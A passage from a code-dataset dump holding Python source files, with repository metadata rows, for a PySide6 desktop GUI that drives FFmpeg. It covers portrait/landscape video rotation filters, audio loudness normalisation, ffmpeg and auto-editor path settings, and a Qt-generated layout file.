'竖屏转横屏-背景图片': 'V2H-I', '竖屏转横屏-背景原片': 'V2H-T', '竖屏转横屏-背景黑色': 'V2H-B'} # 将字典的值添加到选项中 self.VcodecpIFcutsomFilter.addItems(list(self.rotate_dict.keys())) # Init_print def init_print(self): logger.debug("VfilterInterface is initialized") # 直接使用导入的全局日志记录器 # Bind Event def bind(self): # file operation self.Vfilterinputfile.clicked.connect(self.select_input_file) self.Vfilteroutputfolder.clicked.connect(self.select_output_folder) self.Vfilterinputclear.clicked.connect(self.clear_input_file) # self.remuxpushButton_2.clicked.connect(lambda: self.norEx('V')) # self.remuxpushButton_3.clicked.connect(lambda: self.norEx('A')) # self.remuxpushButton_5.clicked.connect(lambda: self.mulEx('V')) # self.remuxpushButton_6.clicked.connect(lambda: self.mulEx('A1')) # self.remuxpushButton_4.clicked.connect(lambda: self.mulEx('A2')) # self.remuxpushButton_7.clicked.connect(lambda: self.mulEx('A3')) # self.remuxpushButton_10.clicked.connect(lambda: self.mulEx('A4')) # self.remuxpushButton_8.clicked.connect(lambda: self.mulEx('S1')) # self.remuxpushButton_9.clicked.connect(lambda: self.mulEx('S2')) # filter operation self.VcodecpIFcutsomFilter.currentIndexChanged.connect(self.change_rotate_filter) self.Vfilterbgimg.clicked.connect(self.select_bg_img) self.VcodecpIFClearFil.clicked.connect(self.clear_filter) self.VcodecpIFcheckBox_4.stateChanged.connect(self.change_audio_filter) self.VfilterlineEdit_3.textChanged.connect(self.change_resolution) # start self.VfilterpushBtn.clicked.connect(self.filter_video) self.VfilterSTBtn.clicked.connect(self.stop) self.VfilterpushBtn_2.clicked.connect(self.unfreeze_config) # File_operation def select_input_file(self): self.append_input_file_args, _ = QFileDialog.getOpenFileNames(self, "选择输入文件", "", "All Files (*)") for file_path in self.append_input_file_args: if file_path not in self.input_file_args: self.input_file_args.append(file_path) item = QListWidgetItem(file_path) self.Vfilterinputlist.addItem(item) def select_output_folder(self): if self.input_file_args != []: output_folder = QFileDialog.getExistingDirectory(self, "选择输出文件夹", "") # 选择输出文件夹 if output_folder != '': # 输出文件夹不为空且输出文件夹与输入文件夹不同 self.output_file_args = [os.path.join(output_folder, os.path.basename(file_path)) for file_path in self.input_file_args] # 获得输出文件,输出文件名与输入文件名相同 self.Vfilteroutputfolder.setText(output_folder) else: self.Vfilteroutputfolder.setText('选择输出文件夹') else: MessageBox("警告", "请先选择输入文件!", parent=self).exec() def clear_input_file(self): self.input_file_args = [] self.output_file_args = [] self.Vfilteroutputfolder.setText('选择输出文件夹') self.Vfilterinputlist.clear() def clear_filter(self): self.VcodecpIFcutsomFilter.setText('横竖屏转换') self.VfilterlineEdit_3.setText('x') self.image_ = ['', ''] self.VcodecpIFcheckBox_4.setChecked(False) self.Vfilterbgimg.setText('选择背景图片') self.VfilterplainTextEdit_2.setPlainText('滤镜参数:') def change_rotate_filter(self): index = self.VcodecpIFcutsomFilter.currentText() # 根据index从self.rotate_dict获取对应的旋转参数 self.image_[0] = self.rotate_dict[index] if self.image_[0] in ['V2H-I', 'V2H-T', 'V2H-B']: self.VfilterlineEdit_3.setText('1920x1080') elif self.image_[0] in ['H2V-I', 'H2V-T', 'H2V-B']: self.VfilterlineEdit_3.setText('1080x1920') else: self.VfilterlineEdit_3.setText('x') filter = '' resolution = self.VfilterlineEdit_3.text() x = resolution.split('x')[0] y = resolution.split('x')[1] if self.image_[0] in ['V2H-T', 'V2H-B', 'H2V-T', 'H2V-B']: fs = FFmpegFilter() filter = fs.rotate_filter(self.image_, x, y) if self.image_[0] in ['V2H-I', 'H2V-I']: fs = FFmpegFilter() filter = fs.rotate_filter(self.image_, x, y, 'flag') if self.VcodecpIFcheckBox_4.isChecked(): af = ' -af loudnorm=i=-16.0:lra=5.0:tp=-0.3' filter = filter + af self.VfilterplainTextEdit_2.setPlainText(filter) def select_bg_img(self): self.image_[1] = QFileDialog.getOpenFileName(self, "选择背景图片", "", "All Files (*)")[0] if self.image_[1] != '': name = os.path.basename(self.image_[1]) self.Vfilterbgimg.setText(name) else: self.image_[1] = '' self.Vfilterbgimg.setText('选择背景图片') def change_audio_filter(self): if self.VcodecpIFcheckBox_4.isChecked() and self.VfilterplainTextEdit_2.toPlainText() != '滤镜参数:': self.VfilterplainTextEdit_2.setPlainText(self.VfilterplainTextEdit_2.toPlainText() + ' -af loudnorm=i=-16.0:lra=5.0:tp=-0.3') elif self.VcodecpIFcheckBox_4.isChecked() and self.VfilterplainTextEdit_2.toPlainText() == '滤镜参数:': self.VfilterplainTextEdit_2.setPlainText(' -af loudnorm=i=-16.0:lra=5.0:tp=-0.3') else: self.VfilterplainTextEdit_2.setPlainText(self.VfilterplainTextEdit_2.toPlainText().replace(' -af loudnorm=i=-16.0:lra=5.0:tp=-0.3', '')) def change_resolution(self): if self.VcodecpIFcutsomFilter.text() != '横竖屏转换': resolution = self.VfilterlineEdit_3.text() x = resolution.split('x')[0] y = resolution.split('x')[1] fs = FFmpegFilter() if self.image_[0] in ['V2H-T', 'V2H-B', 'H2V-T', 'H2V-B']: filter = fs.rotate_filter(self.image_, x, y) if self.image_[0] in ['V2H-I', 'H2V-I']: filter = fs.rotate_filter(self.image_, x, y, 'flag') if self.VcodecpIFcheckBox_4.isChecked(): af = ' -af loudnorm=i=-16.0:lra=5.0:tp=-0.3' filter = filter + af self.VfilterplainTextEdit_2.setPlainText(filter) def filter_video(self): cmd = [] if self.VfilterplainTextEdit_2.toPlainText() in ['', '滤镜参数:']: MessageBox("警告", "请先选择滤镜!", parent=self).exec() return if self.input_file_args != [] and self.output_file_args != []: while self.i < len(self.input_file_args): # 循环处理多个文件 if self.is_paused: # 循环暂停 break input_file = self.input_file_args[self.i] output_file = self.output_file_args[self.i] + 'rotate' +os.path.splitext(input_file)[-1] if os.path.isfile(input_file): rotate_filter = self.VfilterplainTextEdit_2.toPlainText() if self.image_[0] in ['V2H-I', 'H2V-I']: fs = FFmpegFilter() duration = fs.get_duration(input_file) rotate_filter = rotate_filter.replace('@duration', str(duration)) cmd += ['-i', f'"{self.image_[1]}"'] cmd += [rotate_filter] encoder = self.VfilterplainTextEdit.toPlainText() cmd += [encoder] try: self.freeze_config() cmd = ['-hide_banner', '-y', '-i', f'"{input_file}"'] + cmd cmd += [f'"{output_file}"'] self.worker = Worker('run', ffpath.ffmpeg_path, ffpath.ffprobe_path, cmd) # 创建worker对象 self.thread = WorkerThread(self.worker) # 创建线程对象 self.thread.started.connect(self.on_thread_started()) # 线程开始信号连接到槽函数 self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.finished.connect(self.filter_thread_finished) # 线程结束信号连接到槽函数 self.thread.start() # 启动线程 except Exception as e: logger.error(f"Error occurred while creating worker object: {e}") else: m = MessageBox("错误", f"{input_file}不存在!", parent=self) if not m.exec(): self.clear_input_file() # 清空输入文件列表 self.i = 2666666666 # 设定一个很大的数值,使线程结束 self.filter_thread_finished() # 进行下一个文件 break def on_thread_started(self): self.is_paused = True # 开启暂停标志 logger.info(f'线程创建,暂停循环,i={self.i}') def filter_thread_finished(self): self.is_paused = False # 重置暂停标志 self.i = self.i + 1 # 开启下一个文件 if self.i < len(self.input_file_args): # 还有文件未处理 logger.info(f'{self.i-1}线程结束,开始循环,i={self.i}') self.filter_video() # 开启下一个线程 else: self.i = 0 # 循环计数器清零 self.unfreeze_config() MessageBox("提示", "转码任务已完成!", parent=self).exec() def freeze_config(self, text=''): self.VfilterplainTextEdit.setEnabled(False) # 禁止修改视频格式 self.VcodecpIFClearFil.setEnabled(False) # 禁止清空滤镜 self.VcodecpIFcutsomFilter.setEnabled(False) # 禁止修改滤镜 self.VfilterlineEdit_3.setEnabled(False) # 禁止修改分辨率 self.Vfilterbgimg.setEnabled(False) # 禁止修改背景图片 self.VcodecpIFcheckBox_4.setEnabled(False) # 禁止修改音频增益 self.VfilterplainTextEdit_2.setEnabled(False) # 禁止修改滤镜参数 logger.info(f"Freeze config. {text}") # self.VcodecpIFconsole.appendPlainText("冻结配置") def unfreeze_config(self): self.VfilterplainTextEdit.setEnabled(True) # 解除视频格式冻结 self.VcodecpIFClearFil.setEnabled(True) # 解除滤镜清空冻结 self.VcodecpIFcutsomFilter.setEnabled(True) # 解除滤镜修改冻结 self.VfilterlineEdit_3.setEnabled(True) # 解除分辨率修改冻结 self.Vfilterbgimg.setEnabled(True) # 解除背景图片修改冻结 self.VcodecpIFcheckBox_4.setEnabled(True) # 解除音频增益修改冻结 self.VfilterplainTextEdit_2.setEnabled(True) # 解除滤镜参数修改冻结 logger.info("Unfreeze config.") # self.VcodecpIFconsole.appendPlainText("解除冻结配置") def stop(self): if self.worker._started_flag: self.is_paused = True # 开启暂停标志 logger.info(f'暂停循环,i={self.i}') self.i = 2600000000 # 设定一个很大的数值,使线程结束 self.worker.interrupt() # 停止worker if self.worker.is_interrupted: # 停止worker self.thread.wait() # 等待线程结束 self.worker.deleteLater() # 删除worker对象 self.thread.deleteLater() # 删除线程对象 self._started_flag = False self.is_paused = False # 重置暂停标志 self.i = 0 # 循环计数器清零 self.unfreeze_config() MessageBox("警告", "转码任务已暂停!软件即将退出,请重新启动!", parent=self).exec()
17,047
Python
.py
296
40.462838
176
0.617463
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,452
setting_Interface.py
wish2333_VideoExtractAndConcat/modules/setting_Interface.py
from modules.logger_config import logger import os import configparser from PySide6.QtCore import Qt, QThread, Signal, QObject, QTime from PySide6.QtGui import QPixmap, QPainter, QColor from PySide6.QtWidgets import QWidget, QFileDialog, QMessageBox, QListWidgetItem from qfluentwidgets import MessageBox from modules.config import ffpath, autopath, set_config, set_auto_path from modules.Ui_settingInterface import Ui_SettingInterface # 打印初始化ffmpeg路径为: # logger.info(f"初始化ffmpeg路径为:{ffpath.ffmpeg_path}") # logger.info(f"初始化ffprobe路径为:{ffpath.ffprobe_path}") class SettingInterface(QWidget, Ui_SettingInterface): def __init__(self, parent=None): super().__init__(parent=parent) self.setupUi(self) self.init_variables() self.init_action() self.init_print() self.bind() # 必须给子界面设置全局唯一的对象名 # Init_variables def init_variables(self): # ffpath ffpath.ffmpeg_path = ffpath.ffmpeg_path ffpath.ffprobe_path = ffpath.ffprobe_path # ffpath.ffplay_path = ffpath.ffplay_path # autopath autopath.auto_path = autopath.auto_path # Init_action def init_action(self): self.SettingIFinputlist.clear() # 判断ffmpeg文件是否存在 if not (os.path.isfile(ffpath.ffmpeg_path) and os.path.isfile( ffpath.ffprobe_path)): self.SettingIFoutputfolder.setText("FFmpeg路径错误,请检查!") elif (os.path.isfile(ffpath.ffmpeg_path) and os.path.isfile(ffpath.ffprobe_path)): self.SettingIFoutputfolder.setText("FFmpeg路径检测通过") if os.path.isfile(ffpath.ffmpeg_path): self.SettingIFinputlist.addItem(ffpath.ffmpeg_path) else: self.SettingIFinputlist.addItem("ffmpeg路径错误,请检查!") if os.path.isfile(ffpath.ffprobe_path): self.SettingIFinputlist.addItem(ffpath.ffprobe_path) else: self.SettingIFinputlist.addItem("ffprobe路径错误,请检查!") # if os.path.isfile(ffpath.ffplay_path): # self.SettingIFinputlist.addItem(ffpath.ffplay_path) # else: # self.SettingIFinputlist.addItem("ffplay路径错误,请检查!") if os.path.isfile(autopath.auto_path): self.SettingIFlineEdit.setText(autopath.auto_path) self.SettingIFpushButton_2.setText('auto-editor路径检测通过') else: self.SettingIFlineEdit.setText("auto-editor路径错误,请检查!") self.SettingIFpushButton_2.setText('请检查') # Init_print def init_print(self): logger.debug("SettingInterface is initialized!") # Bind Event def bind(self): # Bind Button Event self.SettingIFinputfile.clicked.connect(self.set_ffmpeg_path) self.SettingIFoutputfolder.clicked.connect(self.set_ffmpeg_path) # self.SettingIFinputclear.clicked.connect(self.default_ffmpeg_path) self.SettingIFpushButton.clicked.connect(self.set_auto_path) # Check Event # LineEdit/ComboBox/SpinBox Event # self.VcodecpIFdoubleSpinBox.valueChanged.connect(self.change_accelerated) # Set ffmpeg path def set_ffmpeg_path(self): ffpath_folder = QFileDialog.getExistingDirectory(self, "选择输出文件夹", "") if ffpath_folder: ffmpeg_path = os.path.join(ffpath_folder, "ffmpeg.exe") ffprobe_path = os.path.join(ffpath_folder, "ffprobe.exe") # ffplay_path = os.path.join(ffpath_folder, "ffplay.exe") set_config(ffmpeg_path, ffprobe_path) ffpath.reset(ffpath) self.init_variables() self.init_action() def set_auto_path(self): auto_path = QFileDialog.getOpenFileName(self, "选择auto-editor路径", "", "auto-editor.exe")[0] if auto_path: set_auto_path(auto_path) autopath.reset(autopath) self.init_variables() self.init_action() # def default_ffmpeg_path(self): # ffpath.ffmpeg_path = "" # ffpath.ffprobe_path = "" # ffpath.ffplay_path = "" # self.SettingIFinputlist.clear() # def unfreeze_default(self):
4,341
Python
.py
93
35.763441
98
0.672353
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,453
__init__.py
wish2333_VideoExtractAndConcat/modules/__init__.py
from PySide6.QtCore import * from PySide6.QtGui import * from PySide6.QtWidgets import * import os
99
Python
.py
4
23.75
31
0.831579
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,454
Ui_VfilterInterface.py
wish2333_VideoExtractAndConcat/modules/Ui_VfilterInterface.py
# -*- coding: utf-8 -*- ################################################################################ ## Form generated from reading UI file 'VfilterInterface.ui' ## ## Created by: Qt User Interface Compiler version 6.7.0 ## ## WARNING! All changes made in this file will be lost when recompiling UI file! ################################################################################ from PySide6.QtCore import (QCoreApplication, QDate, QDateTime, QLocale, QMetaObject, QObject, QPoint, QRect, QSize, QTime, QUrl, Qt) from PySide6.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont, QFontDatabase, QGradient, QIcon, QImage, QKeySequence, QLinearGradient, QPainter, QPalette, QPixmap, QRadialGradient, QTransform) from PySide6.QtWidgets import (QAbstractScrollArea, QApplication, QFrame, QGridLayout, QHBoxLayout, QLabel, QLayout, QLineEdit, QListWidgetItem, QPlainTextEdit, QPushButton, QSizePolicy, QSpacerItem, QVBoxLayout, QWidget) from qfluentwidgets import (CheckBox, EditableComboBox, ListWidget, PlainTextEdit, PrimaryPushButton, PushButton, ScrollArea) class Ui_VfilterInterface(object): def setupUi(self, VfilterInterface): if not VfilterInterface.objectName(): VfilterInterface.setObjectName(u"VfilterInterface") VfilterInterface.resize(1081, 741) VfilterInterface.setMinimumSize(QSize(780, 0)) self.verticalLayout = QVBoxLayout(VfilterInterface) self.verticalLayout.setObjectName(u"verticalLayout") self.VfilterscrollArea = ScrollArea(VfilterInterface) self.VfilterscrollArea.setObjectName(u"VfilterscrollArea") self.VfilterscrollArea.setMinimumSize(QSize(760, 0)) self.VfilterscrollArea.setFrameShape(QFrame.Shape.NoFrame) self.VfilterscrollArea.setFrameShadow(QFrame.Shadow.Sunken) self.VfilterscrollArea.setWidgetResizable(True) self.VfilterfacescrollAreaWidgetContents = QWidget() self.VfilterfacescrollAreaWidgetContents.setObjectName(u"VfilterfacescrollAreaWidgetContents") self.VfilterfacescrollAreaWidgetContents.setGeometry(QRect(0, 0, 1063, 723)) self.verticalLayout_3 = QVBoxLayout(self.VfilterfacescrollAreaWidgetContents) self.verticalLayout_3.setObjectName(u"verticalLayout_3") self.Vfilterbox01 = QHBoxLayout() self.Vfilterbox01.setSpacing(20) self.Vfilterbox01.setObjectName(u"Vfilterbox01") self.Vfilterbox01.setSizeConstraint(QLayout.SizeConstraint.SetDefaultConstraint) self.VfilterverticalLayout_4 = QVBoxLayout() self.VfilterverticalLayout_4.setObjectName(u"VfilterverticalLayout_4") self.VfilterverticalLayout_4.setContentsMargins(-1, -1, 0, -1) self.VfilterTitle1 = QLabel(self.VfilterfacescrollAreaWidgetContents) self.VfilterTitle1.setObjectName(u"VfilterTitle1") sizePolicy = QSizePolicy(QSizePolicy.Policy.Maximum, QSizePolicy.Policy.Maximum) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.VfilterTitle1.sizePolicy().hasHeightForWidth()) self.VfilterTitle1.setSizePolicy(sizePolicy) self.VfilterTitle1.setMaximumSize(QSize(150, 64)) font = QFont() font.setPointSize(28) font.setBold(True) font.setKerning(True) self.VfilterTitle1.setFont(font) self.VfilterverticalLayout_4.addWidget(self.VfilterTitle1) self.VfilterTitle2 = QLabel(self.VfilterfacescrollAreaWidgetContents) self.VfilterTitle2.setObjectName(u"VfilterTitle2") sizePolicy1 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Maximum) sizePolicy1.setHorizontalStretch(0) sizePolicy1.setVerticalStretch(0) sizePolicy1.setHeightForWidth(self.VfilterTitle2.sizePolicy().hasHeightForWidth()) self.VfilterTitle2.setSizePolicy(sizePolicy1) self.VfilterTitle2.setMaximumSize(QSize(100, 45)) font1 = QFont() font1.setPointSize(18) font1.setBold(True) font1.setKerning(True) self.VfilterTitle2.setFont(font1) self.VfilterverticalLayout_4.addWidget(self.VfilterTitle2) self.Vfilterbox01.addLayout(self.VfilterverticalLayout_4) self.Vfilterlabel = QLabel(self.VfilterfacescrollAreaWidgetContents) self.Vfilterlabel.setObjectName(u"Vfilterlabel") self.Vfilterlabel.setMaximumSize(QSize(16777215, 80)) self.Vfilterbox01.addWidget(self.Vfilterlabel) self.VfilterhorizontalSpacer = QSpacerItem(20, 20, QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Minimum) self.Vfilterbox01.addItem(self.VfilterhorizontalSpacer) self.VfilterpushBtn = PrimaryPushButton(self.VfilterfacescrollAreaWidgetContents) self.VfilterpushBtn.setObjectName(u"VfilterpushBtn") sizePolicy2 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Fixed) sizePolicy2.setHorizontalStretch(0) sizePolicy2.setVerticalStretch(0) sizePolicy2.setHeightForWidth(self.VfilterpushBtn.sizePolicy().hasHeightForWidth()) self.VfilterpushBtn.setSizePolicy(sizePolicy2) self.VfilterpushBtn.setMinimumSize(QSize(240, 60)) font2 = QFont() font2.setPointSize(16) font2.setBold(True) font2.setKerning(True) self.VfilterpushBtn.setFont(font2) self.VfilterpushBtn.setFlat(False) self.Vfilterbox01.addWidget(self.VfilterpushBtn) self.VfilterSTBtn = QPushButton(self.VfilterfacescrollAreaWidgetContents) self.VfilterSTBtn.setObjectName(u"VfilterSTBtn") self.VfilterSTBtn.setMinimumSize(QSize(120, 60)) font3 = QFont() font3.setPointSize(16) font3.setBold(True) self.VfilterSTBtn.setFont(font3) self.Vfilterbox01.addWidget(self.VfilterSTBtn) self.VfilterpushBtn_2 = PushButton(self.VfilterfacescrollAreaWidgetContents) self.VfilterpushBtn_2.setObjectName(u"VfilterpushBtn_2") self.VfilterpushBtn_2.setMinimumSize(QSize(80, 60)) self.VfilterpushBtn_2.setFont(font3) self.Vfilterbox01.addWidget(self.VfilterpushBtn_2) self.verticalLayout_3.addLayout(self.Vfilterbox01) self.Vfilterbox02 = QFrame(self.VfilterfacescrollAreaWidgetContents) self.Vfilterbox02.setObjectName(u"Vfilterbox02") self.Vfilterbox02.setEnabled(True) sizePolicy3 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Minimum) sizePolicy3.setHorizontalStretch(0) sizePolicy3.setVerticalStretch(0) sizePolicy3.setHeightForWidth(self.Vfilterbox02.sizePolicy().hasHeightForWidth()) self.Vfilterbox02.setSizePolicy(sizePolicy3) self.Vfilterbox02.setMinimumSize(QSize(480, 145)) self.Vfilterbox02.setMaximumSize(QSize(16777215, 240)) self.Vfilterbox02.setFrameShape(QFrame.Shape.StyledPanel) self.Vfilterbox02.setFrameShadow(QFrame.Shadow.Raised) self.gridLayout = QGridLayout(self.Vfilterbox02) self.gridLayout.setObjectName(u"gridLayout") self.Vfilterinputfile = PushButton(self.Vfilterbox02) self.Vfilterinputfile.setObjectName(u"Vfilterinputfile") font4 = QFont() font4.setPointSize(12) font4.setBold(True) self.Vfilterinputfile.setFont(font4) self.gridLayout.addWidget(self.Vfilterinputfile, 0, 0, 1, 1) self.Vfilterinputclear = PushButton(self.Vfilterbox02) self.Vfilterinputclear.setObjectName(u"Vfilterinputclear") self.Vfilterinputclear.setFont(font4) self.gridLayout.addWidget(self.Vfilterinputclear, 0, 1, 1, 1) self.Vfilteroutputfolder = QPushButton(self.Vfilterbox02) self.Vfilteroutputfolder.setObjectName(u"Vfilteroutputfolder") self.Vfilteroutputfolder.setFont(font4) self.gridLayout.addWidget(self.Vfilteroutputfolder, 0, 2, 1, 1) self.Vfilterinputlist = ListWidget(self.Vfilterbox02) self.Vfilterinputlist.setObjectName(u"Vfilterinputlist") sizePolicy4 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Preferred) sizePolicy4.setHorizontalStretch(0) sizePolicy4.setVerticalStretch(0) sizePolicy4.setHeightForWidth(self.Vfilterinputlist.sizePolicy().hasHeightForWidth()) self.Vfilterinputlist.setSizePolicy(sizePolicy4) self.Vfilterinputlist.setMinimumSize(QSize(0, 120)) self.Vfilterinputlist.setMaximumSize(QSize(16777215, 200)) self.Vfilterinputlist.setAcceptDrops(True) self.Vfilterinputlist.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOn) self.Vfilterinputlist.setHorizontalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAsNeeded) self.Vfilterinputlist.setSizeAdjustPolicy(QAbstractScrollArea.SizeAdjustPolicy.AdjustIgnored) self.Vfilterinputlist.setDragEnabled(False) self.gridLayout.addWidget(self.Vfilterinputlist, 1, 0, 1, 3) self.verticalLayout_3.addWidget(self.Vfilterbox02) self.Vfilterbox03 = QHBoxLayout() self.Vfilterbox03.setObjectName(u"Vfilterbox03") self.VcodecpIFTitle2_3 = QLabel(self.VfilterfacescrollAreaWidgetContents) self.VcodecpIFTitle2_3.setObjectName(u"VcodecpIFTitle2_3") sizePolicy5 = QSizePolicy(QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Maximum) sizePolicy5.setHorizontalStretch(0) sizePolicy5.setVerticalStretch(0) sizePolicy5.setHeightForWidth(self.VcodecpIFTitle2_3.sizePolicy().hasHeightForWidth()) self.VcodecpIFTitle2_3.setSizePolicy(sizePolicy5) self.VcodecpIFTitle2_3.setMinimumSize(QSize(240, 45)) self.VcodecpIFTitle2_3.setMaximumSize(QSize(600, 16777215)) self.VcodecpIFTitle2_3.setFont(font1) self.Vfilterbox03.addWidget(self.VcodecpIFTitle2_3) self.VcodecpIFTitle2_2 = QLabel(self.VfilterfacescrollAreaWidgetContents) self.VcodecpIFTitle2_2.setObjectName(u"VcodecpIFTitle2_2") sizePolicy6 = QSizePolicy(QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Minimum) sizePolicy6.setHorizontalStretch(0) sizePolicy6.setVerticalStretch(0) sizePolicy6.setHeightForWidth(self.VcodecpIFTitle2_2.sizePolicy().hasHeightForWidth()) self.VcodecpIFTitle2_2.setSizePolicy(sizePolicy6) self.VcodecpIFTitle2_2.setMinimumSize(QSize(60, 45)) self.VcodecpIFTitle2_2.setMaximumSize(QSize(240, 45)) self.VcodecpIFTitle2_2.setFont(font1) self.Vfilterbox03.addWidget(self.VcodecpIFTitle2_2) self.verticalLayout_3.addLayout(self.Vfilterbox03) self.Vfilterbox04 = QHBoxLayout() self.Vfilterbox04.setObjectName(u"Vfilterbox04") self.Vfilterframe_2 = QFrame(self.VfilterfacescrollAreaWidgetContents) self.Vfilterframe_2.setObjectName(u"Vfilterframe_2") sizePolicy6.setHeightForWidth(self.Vfilterframe_2.sizePolicy().hasHeightForWidth()) self.Vfilterframe_2.setSizePolicy(sizePolicy6) self.Vfilterframe_2.setMinimumSize(QSize(600, 360)) self.Vfilterframe_2.setMaximumSize(QSize(600, 360)) self.Vfilterframe_2.setFrameShape(QFrame.Shape.StyledPanel) self.Vfilterframe_2.setFrameShadow(QFrame.Shadow.Raised) self.verticalLayout_2 = QVBoxLayout(self.Vfilterframe_2) self.verticalLayout_2.setObjectName(u"verticalLayout_2") self.VfiltergridLayout = QGridLayout() self.VfiltergridLayout.setObjectName(u"VfiltergridLayout") self.VfiltergridLayout.setHorizontalSpacing(24) self.VfiltergridLayout.setVerticalSpacing(16) self.Vfilterlabel_5 = QLabel(self.Vfilterframe_2) self.Vfilterlabel_5.setObjectName(u"Vfilterlabel_5") self.Vfilterlabel_5.setFont(font2) self.VfiltergridLayout.addWidget(self.Vfilterlabel_5, 0, 0, 1, 1) self.VfilterplainTextEdit = PlainTextEdit(self.Vfilterframe_2) self.VfilterplainTextEdit.setObjectName(u"VfilterplainTextEdit") font5 = QFont() font5.setPointSize(12) self.VfilterplainTextEdit.setFont(font5) self.VfiltergridLayout.addWidget(self.VfilterplainTextEdit, 0, 1, 1, 2) self.verticalLayout_2.addLayout(self.VfiltergridLayout) self.Vfilterbox04.addWidget(self.Vfilterframe_2) self.Vfilterframe_3 = QFrame(self.VfilterfacescrollAreaWidgetContents) self.Vfilterframe_3.setObjectName(u"Vfilterframe_3") sizePolicy6.setHeightForWidth(self.Vfilterframe_3.sizePolicy().hasHeightForWidth()) self.Vfilterframe_3.setSizePolicy(sizePolicy6) self.Vfilterframe_3.setMinimumSize(QSize(280, 360)) self.Vfilterframe_3.setMaximumSize(QSize(480, 360)) self.Vfilterframe_3.setFrameShape(QFrame.Shape.StyledPanel) self.Vfilterframe_3.setFrameShadow(QFrame.Shadow.Raised) self.gridLayout_3 = QGridLayout(self.Vfilterframe_3) self.gridLayout_3.setObjectName(u"gridLayout_3") self.VcodecpIFcheckBox_4 = CheckBox(self.Vfilterframe_3) self.VcodecpIFcheckBox_4.setObjectName(u"VcodecpIFcheckBox_4") sizePolicy6.setHeightForWidth(self.VcodecpIFcheckBox_4.sizePolicy().hasHeightForWidth()) self.VcodecpIFcheckBox_4.setSizePolicy(sizePolicy6) self.VcodecpIFcheckBox_4.setMinimumSize(QSize(0, 35)) self.VcodecpIFcheckBox_4.setMaximumSize(QSize(16777215, 40)) self.VcodecpIFcheckBox_4.setFont(font4) self.gridLayout_3.addWidget(self.VcodecpIFcheckBox_4, 1, 1, 1, 1) self.VfilterlineEdit_3 = QLineEdit(self.Vfilterframe_3) self.VfilterlineEdit_3.setObjectName(u"VfilterlineEdit_3") self.gridLayout_3.addWidget(self.VfilterlineEdit_3, 4, 1, 1, 1) self.Vfilterlabel_8 = QLabel(self.Vfilterframe_3) self.Vfilterlabel_8.setObjectName(u"Vfilterlabel_8") self.gridLayout_3.addWidget(self.Vfilterlabel_8, 3, 1, 1, 1) self.VfilterplainTextEdit_2 = QPlainTextEdit(self.Vfilterframe_3) self.VfilterplainTextEdit_2.setObjectName(u"VfilterplainTextEdit_2") font6 = QFont() font6.setPointSize(10) self.VfilterplainTextEdit_2.setFont(font6) self.VfilterplainTextEdit_2.setTextInteractionFlags(Qt.TextInteractionFlag.TextEditorInteraction) self.gridLayout_3.addWidget(self.VfilterplainTextEdit_2, 6, 0, 1, 2) self.VcodecpIFClearFil = PushButton(self.Vfilterframe_3) self.VcodecpIFClearFil.setObjectName(u"VcodecpIFClearFil") self.VcodecpIFClearFil.setMinimumSize(QSize(0, 40)) self.gridLayout_3.addWidget(self.VcodecpIFClearFil, 1, 0, 1, 1) self.VcodecpIFcutsomFilter = EditableComboBox(self.Vfilterframe_3) self.VcodecpIFcutsomFilter.setObjectName(u"VcodecpIFcutsomFilter") self.VcodecpIFcutsomFilter.setFont(font5) self.VcodecpIFcutsomFilter.setReadOnly(True) self.gridLayout_3.addWidget(self.VcodecpIFcutsomFilter, 3, 0, 1, 1) self.Vfilterbgimg = PushButton(self.Vfilterframe_3) self.Vfilterbgimg.setObjectName(u"Vfilterbgimg") sizePolicy7 = QSizePolicy(QSizePolicy.Policy.Maximum, QSizePolicy.Policy.Fixed) sizePolicy7.setHorizontalStretch(0) sizePolicy7.setVerticalStretch(0) sizePolicy7.setHeightForWidth(self.Vfilterbgimg.sizePolicy().hasHeightForWidth()) self.Vfilterbgimg.setSizePolicy(sizePolicy7) self.Vfilterbgimg.setMaximumSize(QSize(240, 30)) self.Vfilterbgimg.setFont(font5) self.gridLayout_3.addWidget(self.Vfilterbgimg, 4, 0, 1, 1) self.Vfilterbox04.addWidget(self.Vfilterframe_3) self.verticalLayout_3.addLayout(self.Vfilterbox04) self.VfilterscrollArea.setWidget(self.VfilterfacescrollAreaWidgetContents) self.verticalLayout.addWidget(self.VfilterscrollArea) self.retranslateUi(VfilterInterface) self.VfilterpushBtn.setDefault(True) QMetaObject.connectSlotsByName(VfilterInterface) # setupUi def retranslateUi(self, VfilterInterface): VfilterInterface.setWindowTitle(QCoreApplication.translate("VfilterInterface", u"Form", None)) self.VfilterTitle1.setText(QCoreApplication.translate("VfilterInterface", u"\u590d\u6742\u6ee4\u955c", None)) self.VfilterTitle2.setText(QCoreApplication.translate("VfilterInterface", u"\u89c6\u9891", None)) self.Vfilterlabel.setText(QCoreApplication.translate("VfilterInterface", u"\u5173\u4e8e\u590d\u6742\u6ee4\u955c\u7684\u5904\u7406", None)) self.VfilterpushBtn.setText(QCoreApplication.translate("VfilterInterface", u"\u5904\u7406\u89c6\u9891", None)) self.VfilterSTBtn.setText(QCoreApplication.translate("VfilterInterface", u"\u4e2d\u6b62\u5904\u7406", None)) self.VfilterpushBtn_2.setText(QCoreApplication.translate("VfilterInterface", u"\u89e3\u51bb", None)) self.Vfilterinputfile.setText(QCoreApplication.translate("VfilterInterface", 